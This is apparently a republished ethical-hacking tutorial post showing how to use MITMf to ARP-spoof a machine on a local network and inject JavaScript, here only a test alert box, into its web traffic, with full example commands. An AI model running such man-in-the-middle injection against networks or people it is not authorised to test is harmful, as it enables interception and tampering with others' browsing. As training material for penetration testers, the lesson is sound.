MITM - Code Injection
Code can be:
1. Stored on a local file --js-file or --html-file
2. Stored online --js-url or --html-url
3. Or you can supply the code through the terminal --js-payload or --html-payload
Usage Case 1:
python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --targets 10.0.0.22 --inject --js-payload "alter(‘test‘);"
The inection code works.
Usage case2:
Edit the js file and save it as alert.js in the root folder.
alert(‘test‘);
Run the commands on the terminal.
python2 mitmf.py --arp --spoof -i eth0 --gateway 10.0.0.1 --target 10.0.0.22 --inject --js-file /root/alert.js
The injection file works...
Ethical Hacking - NETWORK PENETRATION TESTING(21)
原文:https://www.cnblogs.com/keepmoving1113/p/12044150.html